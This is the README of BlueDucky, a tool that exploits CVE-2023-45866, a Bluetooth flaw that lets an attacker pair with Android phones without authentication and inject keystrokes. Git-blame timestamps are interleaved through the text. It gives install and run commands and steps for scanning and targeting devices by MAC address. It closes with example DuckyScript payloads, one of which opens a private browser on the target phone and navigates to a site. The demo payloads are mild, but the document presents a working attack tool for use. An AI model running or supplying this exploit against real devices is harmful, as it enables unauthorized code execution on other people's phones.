2024-01-17 02:31:10 +00:00
# BlueDucky (Android) 🦆
2024-01-16 06:57:05 +00:00
2024-01-17 02:14:31 +00:00
🚨 CVE-2023-45866 - BlueDucky Implementation (Using DuckyScript)
2024-01-17 02:31:10 +00:00
2024-01-17 02:14:31 +00:00
🔓 Unauthenticated Peering Leading to Code Execution (Using HID Keyboard)
2024-01-17 02:16:47 +00:00
[This is an implementation of the CVE discovered by marcnewlin ](https://github.com/marcnewlin/hi_my_name_is_keyboard )
2024-01-16 06:57:05 +00:00
< p align = "center" >
2024-01-17 02:15:51 +00:00
< img src = "./images/start.png" >
2024-01-16 06:57:05 +00:00
< / p >
2024-01-17 02:14:31 +00:00
## Introduction 📢
BlueDucky is a powerful tool for exploiting a vulnerability in Bluetooth devices. By running this script, you can:
1. 📡 Load saved Bluetooth devices that are no longer visible but have Bluetooth still enabled.
2. 📂 Automatically save any devices you scan.
2024-01-17 02:17:52 +00:00
3. 💌 Send messages via ducky script format to interact with devices.
2024-01-17 02:14:31 +00:00
I've successfully run this on a Raspberry Pi 4 using the default Bluetooth module. It works against various phones, with an interesting exception for a New Zealand brand, Vodafone.
## Installation and Usage 🛠️
### Setup Instructions
```bash
# update apt
sudo apt-get update
sudo apt-get -y upgrade
# install dependencies from apt
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
git gcc python3-pip python3-setuptools \
python3-pydbus
# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install
# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/
```
## Running BlueDucky
```bash
git clone https://github.com/pentestfunctions/BlueDucky.git
cd BlueDucky
python3 BlueDucky.py
```
## Operational Steps 🕹️
1. On running, it prompts for the target MAC address.
2. Pressing nothing triggers an automatic scan for devices.
3. Devices previously found are stored in known_devices.txt.
4. If known_devices.txt exists, it checks this file before scanning.
5. Executes using payload.txt file.
6. Successful execution will result in automatic connection and script running.
## Duckyscript 💻
🚧 Work in Progress:
2024-01-19 03:14:28 +00:00
- Figuring out the best way to handle DELAY formatting in duckyscript as we need to constantly sending keyboard release signals to stay stable.
2024-01-17 02:14:31 +00:00
#### 📝 Example payload.txt:
2024-01-16 06:57:05 +00:00
```bash
2024-01-19 03:14:28 +00:00
REM Title of the payload
STRING ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-=+ \|[{]}; :'",< . > /?
GUI D
2024-01-16 06:57:05 +00:00
```
2024-01-19 07:40:48 +00:00
```bash
DELAY 500
ESCAPE
GUI d
ALT ESCAPE
GUI b
DELAY 700
REM PRIVATE_BROWSER is equal to CTRL + SHIFT + N
PRIVATE_BROWSER
DELAY 700
CTRL l
ALT d
DELAY 300
STRING hackertyper.net
DELAY 300
ENTER
DELAY 300
```
2024-01-17 02:14:31 +00:00
## Enjoy experimenting with BlueDucky! 🌟
2024-01-17 02:18:59 +00:00
